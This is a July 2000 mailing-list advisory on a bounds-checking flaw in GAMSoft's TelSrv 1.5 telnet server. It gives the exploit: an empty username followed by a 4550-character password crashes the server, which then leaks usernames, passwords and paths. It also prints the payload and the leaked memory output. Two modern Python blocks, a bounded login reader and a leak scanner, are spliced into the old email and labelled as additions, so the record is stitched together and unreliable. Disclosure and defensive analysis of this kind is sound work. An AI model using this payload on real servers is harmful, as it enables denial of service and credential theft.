Subject: TelSrv Reveals Usernames & Passwords After DoS Attack
From: webster (webster@PIS.COM.AU)
Date: Sat Jul 29 2000 - 01:47:09 CDT


----------
Details
----------

Application: GAMSoft's TelSrv 1.5 (could be more... I don't have time to
check, nor do I have the other programs)
Problem Type: Denial of Service Attack - Reveals User Names & Passwords
Author: Patrick Webster (mailto:webster@pis.com.au)
Platform: Win95 (could be more again... unable to test)
Risk Factor: High
Credibility: Patrick Webster (mailto:webster@pis.com.au)
Vendor Status: Contacted, but no reply.
Vendor Website: http://www.gamsoft.com
Discovered: 20th July, 2000 (Australian)
Reported: 28th July, 2000 (Australian)

-----------------
Introduction
-----------------

*Note: This is my first report, so forgive me if I make any mistakes /
errors etc...

I first discovered this problem when trying to perform the Denial of Service
attack on TelSrv 1.5 which was reported not long ago. I had downloaded
TelSrv on 28 August 1999, and after playing around with it, decided I didn't
need it, thus uninstalling it and forgetting about it. When I received the
DoS report, I remembered I still had the installation, and decided to give
it a go. What was odd was that when I did it, TelSrv didn't crash; it was
working fine, prompting me for the password. I decided to try sending the
4550 characters as the password, and when I did, TelSrv crashed, sending
back a bunch of unimportant characters. At first I thought these characters
were worthless, until I noticed the message "Welcome Admin!", which was the
message to be displayed upon login by user 'admin'. I then figured that if
it displays the admin login message, it may very well display other hidden
details. I set up another account to test for this - Username: 22222,
Password: 11111. I did the crash again, and to my surprise, there, in the
bunch of junk characters, were the numbers 22222 & 11111! I tried this again
using different names, such as a1b2c3, and when I tried the crash again, it
displayed what looked like encrypted characters (eg. ?1u23, not accurate
though). With this in mind, I decided that I would find the encrypted values
of each character by creating account names such as ABCabc123!# and so on,
and writing a program to decrypt this.

I created a text file, which was to contain the encrypted version of the
character and a decrypted version, and while I was using 'cut & paste' to
transfer the encrypted character to the text file, I noticed that the
character had now changed to its real form. The character had changed due to
the difference between DOS characters and Windows characters (??bit - 32bit?),
the DOS characters being shown in telnet & Notepad, whereas the Windows
symbols are shown in Wordpad. This explains why the numbers were the same,
compared to the letters, which were different. So basically, all you have to
do is use the DoS attack, using 4550 characters (maybe less?), copy the data
which is forced back, view it with Wordpad or the like, and simply look
through the data for any recognisable words etc. One username always seems
to be displayed after the file's path, so that is a start.

----------
Exploit
----------

The problem is bad bounds checking, so that when you connect to the TelSrv
Telnet Server and use 4550 characters as a password, the telnet service
crashes, responding to the client with data containing TelSrv usernames,
passwords & custom login messages. This data can then be used to login to
TelSrv. The only problem is that it crashes the server upon execution.
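The root cause named above is a password field that is copied without a length check. The following Python is an added example, not TelSrv's code (which is not available); the 64-byte limit and the account table are constructed for illustration. It sketches the bounded reader such a server should have used: each byte is counted before it is stored, an overlong field is rejected and the connection dropped instead of the process crashing and spilling memory back to the client, and the event is logged so the attempt shows up in monitoring.

```python
import hmac
import io
import logging
from typing import BinaryIO, Dict

# Hypothetical bound: TelSrv's real buffer size is not published on this page.
MAX_FIELD_LEN = 64

# Constructed account table, reusing the report's own test account.
# A real server stores password hashes; plaintext here only keeps the demo short.
ACCOUNTS: Dict[str, str] = {"11111username11111": "22222password22222"}

log = logging.getLogger("telsrv-hardened")


class LineTooLong(ValueError):
    """A client sent more than the allowed bytes without ending the line."""


def read_bounded_line(stream: BinaryIO, limit: int = MAX_FIELD_LEN) -> bytes:
    """Read one LF-terminated field, storing at most `limit` bytes.

    Telnet clients send CR LF, so a CR is skipped rather than stored and never
    eats a slot of the budget (a 64-byte password fits exactly, a 65-byte one
    does not). The unsafe pattern this replaces copies until the terminator
    arrives, which is what lets a multi-kilobyte password overrun a fixed
    buffer; here the count is checked before each byte is kept.
    """
    buf = bytearray()
    while True:
        chunk = stream.read(1)      # one byte at a time keeps the bound exact
        if not chunk or chunk == b"\n":
            return bytes(buf)       # peer closed, or the field is complete
        if chunk == b"\r":
            continue
        if len(buf) >= limit:
            raise LineTooLong(f"field exceeded {limit} bytes")
        buf += chunk


def login_status(raw: bytes, accounts: Dict[str, str] = ACCOUNTS) -> str:
    """Run one username/password exchange over a socket stand-in.

    Returns "ok" (authenticated), "failed" (bad credentials) or "rejected"
    (bound violated; the server closes the connection here instead of
    crashing).
    """
    stream = io.BytesIO(raw)        # stand-in for the accepted socket
    try:
        user = read_bounded_line(stream).decode("ascii", errors="replace")
        password = read_bounded_line(stream).decode("ascii", errors="replace")
    except LineTooLong as exc:
        log.warning("login rejected, dropping connection: %s", exc)
        return "rejected"
    expected = accounts.get(user)
    if expected is not None and hmac.compare_digest(expected.encode(), password.encode()):
        return "ok"
    return "failed"


if __name__ == "__main__":
    logging.basicConfig(level=logging.WARNING)
    print(login_status(b"11111username11111\r\n22222password22222\r\n"))  # ok
    print(login_status(b"\r\n" + b"A" * 4550 + b"\r\n"))                   # rejected
```

The empty username followed by a long password is the exact sequence the report uses; with the bound in place it is rejected after 64 bytes and the remaining kilobytes are never buffered. The rejection is logged with a warning so repeated overlong fields from one client are visible to whoever watches the server log.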

Start Example:

*Note: For this example, I have created only one account, details are as
follows...

Username: 11111username11111
Password: 22222password22222
Custom Message: This is the custom greeting message!

If you look towards the end of the following code, you will see that
'11111username11111, 22222password22222 & This is the custom greeting
message!' are displayed. They are displayed normally because of the
formatting of this document.

Please Wait...Connection Accepted (TelSrv 1.5)

This copy of TelSrv is not registered. Registration will remove this
message and the 5 second delay...

Username : (none, just hit enter)

Password :
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*********************************************AdjustTokenPriveleges Failed :
%lu
AdjustTokenPriveleges Failed : %lu (%s)
LookupPrivilegeValue Failed : %lu
LookupPrivilegeValue Failed : %lu (%s)
SeShutdownPrivilegeOpenProcessToken Failed : %lu
OpenProcessToken Failed : %lu (%s)

Requesting shutdown priveleges...

Unknown command

Goodbye!
exitError : No priveleges for that operation
dosshutdownShutdown failed! If your host system is Windows NT,
this process does not have priveleges to shut down the system.

Shutting down...
reboothelpPassword :

Error : User database version does not match program version.Note : User
database will be converted to new version of TelSrv.Could not save user
database.No users are defined. Nobody can log in to the
server.S.EXE""%s".DAT.HLPGAMSoftC:\TELSRV.LOG.LOG\LOGIN.WAV\LOGOUT.WAVCTel
srvDlgWhatWhenWhoTelSrv (0 Connections)TelSrv (%d Connections)Number of
connections : %dAre you sure you want to terminate TelSrv?Cant access log
file!!Server%-25s%-25s%s
%d/%d/%d %d:%02d:%02dLogging in...%d.%d.%d.%dPlease Wait...Logged in as
"%s"Login as "%s" failedConnection terminatedFailed to stop the
server.Warning! There are active connection(s). If you stop the server now,
these connections will be terminated.

Are you sure you want to stop the server?Failed to start the server. This
can be caused by several problems :

TCP/IP is not installed on this system.
The port number is invalid.
The port number is already in use by another application.Server
ConfigurationDI_xC/ӝҀkZ LJ_xCXes)75_Px )e
x S x
x SC:\PROGRAM FILES\TELSRV\TELSRV.DAT"C:\PROGRAM
FILES\TELSRV\TELSRVS.EXE"11111username11111)k,!__LQEM%QeS\3?T"
L9!sСZPc'2rny+r6'gv5*1N
522222password22222ɰ*-
CAo1seu/շOD/]b"}FTl7 }[73?!y5֙Ԟg+~vOAo*ǿg
h+>UThis is the custom greeting
message!!?9D5яH4-UM5G$T/a)"{z$LYa2]^
cgU:=9*MYrhVIdw.M7+Jp"ma
ΰK"b/#زMy2
:8""5M;>wdLM'7'U8%X͍U(:?
K5׬{tdRӹī$/d҆bX_/;-vXʹ0
acU͜
`oa
B$'%QnGƟoD%Y\9' zU'.'`;
:^kM]G-BxG&S_nDd>_t-}u'd$r&PY<ބaaaaaaaaaaaa
aaaaaaaaaaaQA-NDNC?i|!(1j#-<xɌY5!UO{-W]h~BM^oW'
"d{u`U*1L$z}gerby"wS-Q{]V5cј%f-Q5yF
8hqCA~(- (\W:%!]Ս()8,FeI-7O$:mh]X# "
WAy59!>J-&ҫ4h6ֻ ̆,]_bn-utv+C&!O d9)L)5xP1
(]VI\ak/A/w<6/ 7eZT
]IyW)?܎

}

b'"vD$$`S83}j
󱀷/xg6Lb̿w1cj-b-EgT
ӳHJ7:'(}c"K-Q-8ǥN4/C"g-d-{U&L[m3(

End Example.

---------
Notes
---------

Some odd things I noticed are things such as that TelSrv did NOT crash every time I performed the operation. I also noticed that it did not always display the full username, password or whatever you're looking for. Sometimes it didn't even respond with any information, just another login prompt. I noticed that when using Windows 95's default telnet application (telnet.exe), the information containing the usernames etc. was not converted to its original form, whereas SecureCRT did correctly display the data, which is what I used for this. There are quite possibly many more interesting things people may come across; people may even wish to look into this further, maybe even figure out where exactly the different usernames & passwords occur (if there is any formatting in the data), or maybe there is something else valuable in the data (other than revealing the remote path of the server, in this case C:\PROGRAM FILES\TELSRV\).
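The Introduction's method of looking through the returned data for recognisable words, and the observation above that the disclosure is sometimes only partial, come down to one question for whoever runs an affected server: which of my credentials were actually exposed? The following Python is an added example, not part of the report; the byte blob and the account table are constructed to resemble the output shown earlier and an operator's own user list. It pulls printable runs from a captured response the way `strings` does, lists anything that looks like a file path, and checks each known credential for a full or partial appearance so the affected accounts can be reset.

```python
import re
from typing import Dict, List

# Constructed stand-in for a captured crash response, shaped like the bytes the
# report shows: install paths, then an account, then high bytes and fragments.
LEAK = (
    b"Server ConfigurationDI_xC/\x93\xd2\x80kZ"
    b'C:\\PROGRAM FILES\\TELSRV\\TELSRV.DAT"C:\\PROGRAM FILES\\TELSRV\\TELSRVS.EXE"'
    b'11111username11111)k,!__LQEM%QeS\\3?T"\x05'
    b"22222password22222\xc9\xb0*-\x00"
    b"This is the custom greeting message!\x3f\x9d\xb5"
    b"gue\x00s3cr\xff"            # a second account, only partly present
)

# Constructed account table an operator would take from their own user database.
ACCOUNTS: Dict[str, str] = {
    "11111username11111": "22222password22222",
    "guest": "s3cret-pass",
}


def printable_runs(blob: bytes, min_run: int = 5) -> List[str]:
    """Readable ASCII runs in the response, the way `strings` reports them.

    Matching is byte-wise ASCII because that is how the credentials appear in
    the report's output; non-ASCII bytes would need decoding under the viewer's
    code page, which the report notes differs between telnet/Notepad and WordPad.
    """
    pattern = rb"[\x20-\x7e]{%d,}" % min_run
    return [m.decode("ascii") for m in re.findall(pattern, blob)]


def leaked_paths(blob: bytes) -> List[str]:
    """Runs that look like Windows paths (the report flags the install path leak)."""
    return [run for run in printable_runs(blob) if re.search(r"[A-Za-z]:\\", run)]


def longest_leaked_fragment(secret: bytes, blob: bytes, min_frag: int = 4) -> bytes:
    """Longest substring of `secret`, at least `min_frag` bytes, found in `blob`.

    Checks substrings longest-first so a full match wins; the partial case
    covers the report's note that a name or password is not always complete.
    """
    n = len(secret)
    for length in range(n, min_frag - 1, -1):
        for start in range(n - length + 1):
            frag = secret[start:start + length]
            if frag in blob:
                return frag
    return b""


def exposure_report(blob: bytes, accounts: Dict[str, str]) -> Dict[str, Dict[str, str]]:
    """Per account: did the username and password leak fully, partially or not at all."""
    report: Dict[str, Dict[str, str]] = {}
    for user, password in accounts.items():
        entry: Dict[str, str] = {}
        for field, value in (("username", user), ("password", password)):
            frag = longest_leaked_fragment(value.encode("ascii"), blob)
            if not frag:
                entry[field] = "none"
            elif len(frag) == len(value):
                entry[field] = "full"
            else:
                entry[field] = "partial:" + frag.decode("ascii")
        report[user] = entry
    return report


if __name__ == "__main__":
    for run in printable_runs(LEAK):
        print("string:", run)
    print("paths:", leaked_paths(LEAK))
    print("exposure:", exposure_report(LEAK, ACCOUNTS))
```

On the constructed blob the first account is reported as fully leaked and "guest" as partially leaked ("s3cr"), which is the outcome that matters: any account with a full or partial hit needs its password changed. `min_frag` is a trade-off; at four bytes the fragment "pass" of "s3cret-pass" would also collide with "22222password22222" if it were tested first, so short fragments should be read as a prompt to look, not as proof.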

--------------
Credibility
--------------

This was discovered by myself (Patrick Webster) around the 20th July 2000 (maybe a day or two earlier), not long after the known DoS attack was released. I acknowledge that I am using the method discovered by someone else in a DoS attack, but I am
yet to receive a report of the DoS attack (being used on the password
prompt) which actually reveals the usernames & passwords of TelSrv, so I
believe no one else has discovered it yet :)

--------------
Greetings
--------------

Greets go out to my girlfriend Jo, ZeroX, AkirA, NEO, Blockhead, Lozza,
Chatalade and anyone else I missed...

-Pothead

----------------------------
Contact Information
----------------------------
If I really need to be contacted, you can reach me at either...
mailto:webster@pis.com.au (preferred)
or
mailto:dope_squad@hotmail.com

Cheers from Australia :) & sorry for the length of this message.

-Patrick Webster